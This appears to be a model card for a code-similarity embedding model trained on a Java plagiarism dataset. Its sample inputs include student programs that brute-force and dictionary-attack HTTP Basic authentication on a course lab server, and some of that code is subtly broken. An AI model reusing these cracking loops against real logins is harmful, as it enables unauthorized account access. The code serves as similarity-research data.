\ \n\n } \n}\n"
- "\nimport java.util.*;\n\npublic class CrackThread implements Runnable {\n\n \
\ private String strUsername;\n private String strURL;\n private int iSeed;\n\
\ private int iEnd;\n \n \n public CrackThread() {\n }\n \n\
\ public void setParams(String url, String username, int seed, int end) {\n\
\ strUsername = username;\n strURL = url;\n iSeed = seed;\n\
\ iEnd = end;\n }\n \n public void run() {\n Date dtStart,\
\ dtEnd;\n PasswordGen pwd = new PasswordGen();\n PasswordTest tester;\n\
\ int i=1;\n boolean bDone = false;\n Result res;\n\n \
\ dtStart = new Date();\n \n \n pwd.setSeed(iSeed);\n\
\ \n while(!bDone) {\n tester = new PasswordTest(strURL,\
\ strUsername, pwd.getNextPassword());\n \n bDone = tester;\n\
\ i++;\n \n \n if(i % 100 == 0)\n\
\ {\n System.out.println(pwd.getPassword());\n \
\ }\n \n if(bDone) {\n \n \
\ res = new Result(strURL, strUsername, pwd.getPassword(), dtStart, new\
\ Date(), i);\n System.out.print(res.toString());\n \
\ }\n else\n {\n \n }\n \
\ \n \n if( i >= iEnd) bDone = true;\n } \
\ \n }\n \n}\n"
- "\n\nimport java.awt.*;\nimport java.awt.event.*;\nimport java.io.*;\nimport java.net.*;\n\
\npublic class Dictionary extends Frame implements ActionListener {\n\n private\
\ TextField tf = new TextField();\n private TextArea ta = new TextArea();\n\n\
\ public void actionPerformed (ActionEvent e) {\n\t String s = tf.getText();\n\
\t String login=\"\";\n try{\n\t BufferedReader bufr = new BufferedReader\n\
\t\t\t(new FileReader (\"words1.txt\"));\n\t String inputLine=\"\";\n\n\n\n\t\
\ if (s.length() != 0)\n {\n\t\t inputLine = bufr.readLine();\n\t\t while\
\ ((inputLine != null) && (inputLine.length() != 3))\n\t\t {\n\t\t\t \n\t\t\t\
\ inputLine = bufr.readLine();\n\t\t }\n\n login=\":\"+inputLine;\n\
\t\t ta.setText (fetchURL (s,login));\n\t\t System.out.println(\"runing\"\
+login);\n\t }while(ta.getText().compareTo(\"Invalid URL\")!=0 || ta.getText().compareTo(\"\
Error URL\")!=0);\n\n\t System.out.println(\"The password is: \"+inputLine);\n\
}\ncatch(Exception ex){}\n\n }\n\n public Dictionary() {\n\n super (\"URL11\
\ Password\");\n\n \n add (tf, BorderLayout.LEFT);\n ta.setEditable(false);\n\
\ add (ta, BorderLayout.CENTER);\n tf.addActionListener (this);\n \
\ addWindowListener (new WindowAdapter() {\n public void windowClosing (WindowEvent\
\ e) {\n dispose();\n System.exit(0);\n }\n });\n \
\ }\n\n private String fetchURL (String urlString,String login) {\n StringWriter\
\ sw = new StringWriter();\n PrintWriter pw = new PrintWriter();\n\n try\
\ {\n URL url = new URL (urlString);\n\n \n MyAuthenticator =\
\ new MyAuthenticator();\n \n\n \n String encoding = new url.misc.BASE64Encoder().encode\
\ (login.getBytes());\n\n \n \n\n \n URLConnection uc =\
\ url.openConnection();\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n InputStream content = (InputStream)uc.getInputStream();\n\
\ BufferedReader in =\n new BufferedReader (new InputStreamReader\
\ (content));\n String line;\n while ((line = in.readLine()) != null)\
\ {\n pw.println (line);\n }\n } catch (MalformedURLException\
\ e) {\n pw.println (\"Invalid URL\");\n } catch (IOException e) {\n\
\ pw.println (\"Error URL\");\n }\n return sw.toString();\n }\n\
\n\n public static void main (String args[]) {\n Frame f = new Dictionary();\n\
\ f.setSize(300, 300);\n f.setVisible (true);\n }\n\n class MyAuthenticator\
\ {\n String getPasswordAuthentication(Frame f, String prompt) {\n final\
\ Dialog jd = new Dialog (f, \"Enter password\", true);\n jd.setLayout (new\
\ GridLayout (0, 1));\n Label jl = new Label (prompt);\n jd.add (jl);\n\
\ TextField username = new TextField();\n username.setBackground (Color.lightGray);\n\
\ jd.add (username);\n TextField password = new TextField();\n \
\ password.setEchoChar ('*');\n password.setBackground (Color.lightGray);\n\
\ jd.add (password);\n Button jb = new Button (\"OK\");\n jd.add\
\ (jb);\n jb.addActionListener (new ActionListener() {\n public\
\ void actionPerformed (ActionEvent e) {\n jd.dispose();\n }\n\
\ });\n jd.pack();\n jd.setVisible(true);\n return username.getText()\
\ + \":\" + password.getText();\n\n }\n }\n\n}\n \n\n class Base64Converter\n\
\ \n \n {\n\n public static final char [ ] alphabet = {\n\
\ 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', \n 'I', 'J', 'K', 'L',\
\ 'M', 'N', 'O', 'P', \n 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', \n\
\ 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', \n 'g', 'h', 'i', 'j',\
\ 'k', 'l', 'm', 'n', \n 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', \n\
\ 'w', 'x', 'y', 'z', '0', '1', '2', '3', \n '4', '5', '6', '7',\
\ '8', '9', '+', '/' }; \n\n \n \n\n public static String encode\
\ ( String s )\n \n {\n return encode ( s.getBytes ( ) );\n\
\ }\n\n public static String encode ( byte [ ] octetString )\n \
\ \n {\n int bits24;\n int bits6;\n\n char [ ] out\n\
\ = new char [ ( ( octetString.length - 1 ) / 3 + 1 ) * 4 ];\n\n \
\ int outIndex = 0;\n int i = 0;\n\n while ( ( i + 3 ) <=\
\ octetString.length )\n {\n \n bits24 = ( octetString\
\ [ i++ ] & 0xFF ) << 16;\n bits24 |= ( octetString [ i++ ] & 0xFF )\
\ << 8;\n bits24 |= ( octetString [ i++ ] & 0xFF ) << 0;\n\n \
\ bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet\
\ [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out\
\ [ outIndex++ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0\
\ ) >> 6;\n out [ outIndex++ ] = alphabet [ bits6 ];\n bits6\
\ = ( bits24 & 0x0000003F );\n out [ outIndex++ ] = alphabet [ bits6\
\ ];\n }\n\n if ( octetString.length - i == 2 )\n {\n \
\ \n bits24 = ( octetString [ i ] & 0xFF ) << 16;\n \
\ bits24 |= ( octetString [ i + 1 ] & 0xFF ) << 8;\n\n bits6 = ( bits24\
\ & 0x00FC0000 ) >> 18;\n out [ outIndex++ ] = alphabet [ bits6 ];\n\
\ bits6 = ( bits24 & 0x0003F000 ) >> 12;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x00000FC0 ) >> 6;\n \
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n }\n else if ( octetString.length - i ==\
\ 1 )\n {\n \n bits24 = ( octetString [ i ] & 0xFF )\
\ << 16;\n\n bits6 = ( bits24 & 0x00FC0000 ) >> 18;\n out [ outIndex++\
\ ] = alphabet [ bits6 ];\n bits6 = ( bits24 & 0x0003F000 ) >> 12;\n\
\ out [ outIndex++ ] = alphabet [ bits6 ];\n\n \n out\
\ [ outIndex++ ] = '=';\n out [ outIndex++ ] = '=';\n }\n\n \
\ return new String ( out );\n }\n\n \n \n }\n\n"
- source_sentence: "\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\
\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final\
\ char [] alphabet = {\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',\n \
\ 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',\n 'Q', 'R', 'S', 'T', 'U',\
\ 'V', 'W', 'X',\n 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',\n 'g',\
\ 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n 'o', 'p', 'q', 'r', 's', 't', 'u',\
\ 'v',\n 'w', 'x', 'y', 'z'};\n\n String pwd=\"\";\n \n for(int i=0;i<52;i++)\n\
\ {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+\"\
\"+alphabet[j]+\"\"+alphabet[k];\n String userPassword = \":\"+pwd;\n RealThread\
\ myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n\
\ th.start();\n try\n {\n \n \n th.sleep(100);\n }\n \
\ catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread\
\ implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection\
\ uc =null;\n private String userPassword;\n private int responseCode = 100;\n\
\ public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n }\n catch(Exception ex1)\n {\n }\n\
\ num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n\
\ {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n\
\ String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty (\"\
Authorization\", \" \" + encoding);\n System.out.println(\"Reponse = \"+uc.getResponseCode()+\"\
for pwd = \"+userPassword);\n this.responseCode = uc.getResponseCode();\n \n\
\ if(uc.getResponseCode()==200)\n {\n System.out.println(\" ======= Password\
\ Found : \"+userPassword+\" ========================================= \");\n\
\ System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println(\"\
Could not execute Thread \"+num+\" \");\n }\n }\n\n}\n"
sentences:
- "\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic\
\ class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t\
\ = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\
\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr =\
\ t.exec(\"md5sum csfirst.html\");\n\n InputStreamReader stre\
\ = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\
\t\t index = s.indexOf(' ');\n\t\t Fmd5 = s.substring(0,index);\n\t\t \
\ System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t \
\ pr = t.exec(\"wget http://www.cs.rmit.edu./students/\");\n\t\t pr = null;\n\
\t\t \n\t\t pr = t.exec(\"md5sum index.html\");\n\t\t \n\n\t\t InputStreamReader\
\ stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader\
\ bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\
\t\t index = temp1.indexOf(' ');\n\t\t Smd5 = temp1.substring(0,index);\n\
\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5\
\ == Smd5)\n\t\t System.out.println(\" changes Detected\");\n\t\t else\n\
\t\t {\n\t\t pr = t.exec(\"diff csfirst.html index.html > report.html\"\
);\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\
\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(\" Message.txt\
\ | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.\");\n\t\t\
\ \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException\
\ e){}\n\t}\n}\t\t\n"
- "import java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class Dictionary\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ String file = \"/usr/share/lib/dict/words\";\n String word;\n char[]\
\ password = new char[MAX_LENGTH];\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n while (!auth) {\n \n BufferedReader in = null;\n \
\ try {\n \n in = new BufferedReader(new FileReader(file));\n\
\ while ((word = in.readLine()) != null && !auth) {\n \
\ try {\n if (word.length() <= MAX_LENGTH) {\n \
\ password = word.toCharArray();\n \n \
\ Authenticator.setDefault(new CrackAuth(password));\n \
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n \
\ }\n } catch (Exception e) {\n System.out.println(\"\
\ was exception: \" + e.getMessage());\n }\n }\n\n \
\ \n } catch (FileNotFoundException fnfe) {\n System.out.println(\"\
File Not Found\");\n } catch (IOException ioe) {\n System.out.println(\"\
IOException\");\n } catch(Exception e) {\n e.printStackTrace();\n\
\ } finally {\n try {\n in.close();\n \
\ } catch (Exception e) {;}\n }\n\n\n }\n if (!auth) {\n\
\ System.out.println(\"Unable determine password\");\n } else {\n\
\ time = (new Date()).getTime() - start.getTime();\n System.out.println(\"\
it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n\
\ }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n\
\ public CrackAuth(char[] password) {\n this.password = password;\n }\n\
\n protected PasswordAuthentication getPasswordAuthentication()\n {\n \
\ String user = \"\";\n return new PasswordAuthentication(user, password);\n\
\ }\n}\n"
- "import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\n\
import java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\
\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\n\
import javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\n\
import javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n \
\ static final String SMTP_SERVER = MailsendPropertyHelper.getProperty(\"smtpServer\"\
);\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty(\"\
recipient\");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty(\"\
sender\");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty(\"\
messageHeader\");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\
\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip\
\ = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject\
\ = MESSAGE_HEADER;\n\t\t\tString body = \"Testing\";\n\n\t\t\tSystem.out.println(\"\
Started sending the message\");\n\t\t\tMailsend.send(smtpServer,recip , from,\
\ subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\
\t\t\t\t\"Usage: java mailsend\"\n\t\t\t\t\t+ \" smtpServer toAddress fromAddress\
\ subjectText bodyText\");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic\
\ static void send(String smtpServer, String receiver,\tString from, String subject,\
\ String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\
\n\t\t\t\n\n\t\t\tprops.put(\"mail.smtp.host\", smtpServer);\n\t\t\tprops.put(\"\
mail.smtp.timeout\", \"20000\");\n\t\t\tprops.put(\"mail.smtp.connectiontimeout\"\
, \"20000\");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props,\
\ null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\
\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\t\
InternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\
\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\
\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println(\"sent the email with the\
\ differences : \"+ + \"using the mail server: \"+ smtpServer);\n\n\t\t}\n\t\t\
catch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n"
datasets:
- buelfhood/SOCO_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
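The pooling module above produces one 768-dimensional vector per input by averaging the token embeddings, with padding tokens masked out (`pooling_mode_mean_tokens: True`). A minimal NumPy sketch of that mean-pooling step on toy data (the embeddings and mask here are illustrative, not real model output):

```python
import numpy as np

def mean_pool(token_embeddings, attention_mask):
    # token_embeddings: (seq_len, dim); attention_mask: (seq_len,) of 0/1
    mask = attention_mask[:, None].astype(float)
    return (token_embeddings * mask).sum(axis=0) / mask.sum()

emb = np.array([[1.0, 2.0], [3.0, 4.0], [9.0, 9.0]])
mask = np.array([1, 1, 0])  # last position is padding and is ignored
print(mean_pool(emb, mask))  # -> [2. 3.]
```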
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
    '\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" ");\n }\n }\n\n}\n',
    'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n    static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n    static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n    static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n    static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
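Because the similarity function is cosine similarity (see Model Description above), the scores returned by `model.similarity` are normalized dot products in [-1, 1]. A toy NumPy sketch of that computation on hand-made vectors:

```python
import numpy as np

def cosine_sim(a, b):
    # cosine similarity between two 1-D vectors
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

u = np.array([1.0, 0.0, 1.0])
v = np.array([1.0, 0.0, 1.0])
w = np.array([0.0, 1.0, 0.0])
print(cosine_sim(u, v))  # close to 1.0: identical direction
print(cosine_sim(u, w))  # 0.0: orthogonal vectors
```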
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_java
* Dataset: [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) at [c8fab14](https://huggingface.co/datasets/buelfhood/SOCO_java/tree/c8fab14a9c72776b7d47763c7ab0bccaed49b7fc)
* Size: 30,069 training samples
* Columns: <code>label</code>, <code>text_1</code>, and <code>text_2</code>
* Approximate statistics based on the first 1000 samples:
| | label | text_1 | text_2 |
|:--------|:-----------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|
| type | int | string | string |
| details | <ul><li>0: ~99.70%</li><li>1: ~0.30%</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 450.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 468.5 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| label | text_1 | text_2 |
|:---------------|:---------------|:---------------|
| <code>0</code> | <code><br><br><br><br> <br>import java.io.*;<br>import java.net.*;<br>import java.Runtime;<br>import java.util.*;<br>import java.net.smtp.SmtpClient; <br><br><br><br>public class WatchDog<br><br>{<br><br> static String strImageOutputFile01 = "WebPageImages01.txt";<br> static String strImageOutputFile02 = "WebPageImages02.txt";<br><br> static String strWebPageOutputFile01 = "WebPageOutput01.txt";<br> static String strWebPageOutputFile02 = "WebPageOutput02.txt";<br><br> static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";<br><br> static String strFromEmailDefault = "@.rmit.edu.";<br> static String strToEmailDefault = "@.rmit.edu.";<br><br> static String strFromEmail = null;<br> static String strToEmail = null;<br><br><br><br><br> public static void main (String args[])<br> <br> {<br><br> <br> <br> <br> <br> <br><br> URL url = null;<br> HttpURLConnection urlConnection;<br> int intContentLength;<br> String strWebPageText = "";<br><br> String strURL = "http://www.cs.rmit.edu./students/";<br> String strPrePend = "...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Watchdog<br>{<br> public static void main(String args[])<br> {<br> <br> String mainLink="http://www.cs.rmit.edu./students/";<br> String sender = "@cs.rmit.edu.";<br> String recipient = "<webtech@acuneeds.>";<br> String hostName = "yallara.cs.rmit.edu.";<br> int delay = 86400000;<br><br> try<br> {<br> int imgSrcIndex, imgSrcEnd;<br> String imgLink;<br> Vector imageList = new Vector();<br> HttpURLConnection imgConnection;<br> URL imgURL;<br><br> <br> EmailClient email = new EmailClient(sender, recipient, hostName);<br><br> <br> URL url=new URL(mainLink);<br> HttpURLConnection connection = (HttpURLConnection) url.openConnection();<br><br> BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));<br><br> <br> FileWriter fwrite = new FileWriter("local.txt");<br> BufferedWriter writefile = new BufferedWriter(fwrite);<br><br> String line=webpage.readLine();<br><br> while (line != null)<br> {<br> <br> writefile.write(line,0,line.length());<br> wri...</code> |
